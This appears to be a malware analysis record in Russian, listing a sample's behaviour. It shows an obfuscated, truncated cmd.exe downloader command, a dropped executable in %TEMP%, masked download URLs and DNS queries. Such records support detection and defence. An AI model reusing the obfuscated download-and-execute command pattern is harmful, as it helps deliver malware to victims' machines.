Техническая информация
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK\qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28...
- %TEMP%\462.exe
- 'kh##t.org':80
- 'vi###edia.net':80
- 'vi###edia.net':443
- 'pr######persianas.com.br':80
- 'ro###lls.com':80
- http://www.kh##t.org/0lz8WgN
- http://www.vi###edia.net/Hj
- http://www.pr######persianas.com.br/KD3q0VRw
- http://pr######persianas.com.br/KD3q0VRw
- http://ro###lls.com/lf
- 'vi###edia.net':443
- DNS ASK kh##t.org
- DNS ASK vi###edia.net
- DNS ASK pr######persianas.com.br
- DNS ASK bu####rtcrafts.com
- DNS ASK ro###lls.com
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK\qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /V/C"set vY=jtSVTVYFmNAbNDcTNztSltHrp;wfeg\XCGU@=,a6douK/qy8kORIP's)n0xi}Qh(2B4$+ :.W-{v3&&for %s in (67,61,27,45,36,53,27,42,32,53,25,67,52,0,0,36,56,28,26,73,41,11,0,28,14,21,69,16,28,21,71,7...